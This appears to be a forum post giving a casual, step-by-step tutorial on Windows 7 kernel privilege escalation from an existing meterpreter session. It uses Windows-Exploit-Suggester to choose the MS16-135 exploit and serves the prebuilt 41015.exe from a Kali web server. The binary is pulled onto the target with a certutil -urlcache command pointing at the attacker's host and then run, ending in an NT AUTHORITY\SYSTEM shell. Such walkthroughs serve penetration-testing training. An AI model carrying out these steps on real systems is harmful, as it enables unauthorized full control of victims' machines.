Adversaries might try to take advantage of some software flaws to get themselves a leg up, if ya know what I mean. When they find a vulnerability in a program, service, or even the operating system or the kernel itself, they can use that little bugger to run their own code.
Windows Kernel Exploits
First up, we gotta figure out how to spot and transfer those kernel exploits onto our target system. For this little adventure, we'll be using Windows 7 as our target. Before we get started, make sure you've already got your foot in the door and a meterpreter session up and running.
The first step is to scan and find any potential kernel weaknesses. We can do this using the Windows-Exploit-Suggester tool. You can grab the script from this link: https://github.com/AonCyberLabs/Windows ... -Suggester
To use the Windows-Exploit-Suggester, you'll need to run these commands:
Code: Select all
./windows-exploit-suggester.py --updateAlright, that command will download the vulnerability database and save it as a nifty little .xlsx file. We'll be using this database to find any weaknesses on the target system.
Next up, we need to gather some info on the target operating system and its configuration. We can do that by running this command in a good old Windows command prompt:
Code: Select all
systeminfoNow we need to copy that info and paste it into a file called "systeminfo.txt". We'll be using this file to find any kernel exploits with the Windows-Exploit-Suggester.
We can use the Windows-Exploit-Suggester to find any vulnerabilities on our target system. We'll run this command on our trusty Kali box:
Code: Select all
./windows-exploit-suggester.py --database <DATABASE.XLSX> --systeminfo <SYSTEMINFO.TXT>The Windows-Exploit-Suggester will give us a list of vulnerabilities we can try to exploit on the target system to bump up our privileges. It's always a good idea to start with the first one it recommends. In this case, let's take a look at the MS16-135 kernel exploit.
Let's do a quick Google search for "MS16-135 exploit" to find out more about it. Looks like there's a GitHub repo with info on the exploit, the source code, and how to use it. Always a good idea to analyze the source code to make sure it's legit and doesn't have any nasty surprises.
In this case, we'll be using the pre-built "41015.exe" exploit.
Now we just need to get it over to the target system.
To do that, we'll start up a local web server on our Kali box using the SimpleHTTPServer Python module:
Code: Select all
sudo python -m SimpleHTTPServer 80To get that exploit executable over to the target system, we can use the trusty old certutil utility. On the target system, just run this command:
Code: Select all
C:\Temp> certutil -urlcache -f http://<KALI-IP>/41015.exe exploit.exeAlright, now we can run the exploit executable on the target system. Just navigate to the folder where you downloaded it and run this command:
Code: Select all
C:\Temp> .\exploit.exeNow, since the exploit needs to know the target operating system, and in our case that's Windows 7, we'll run it like this:
Code: Select all
C:\Temp> .\exploit.exe 7Once you run the exploit with the OS specified, it should only take a few seconds to do its thing. After that, you should have an elevated shell with NT AUTHORITY/SYSTEM privileges. Just sit back and enjoy that sweet, sweet admin access!
My example:
C:\Temp> whoami
whoami
nt authority\system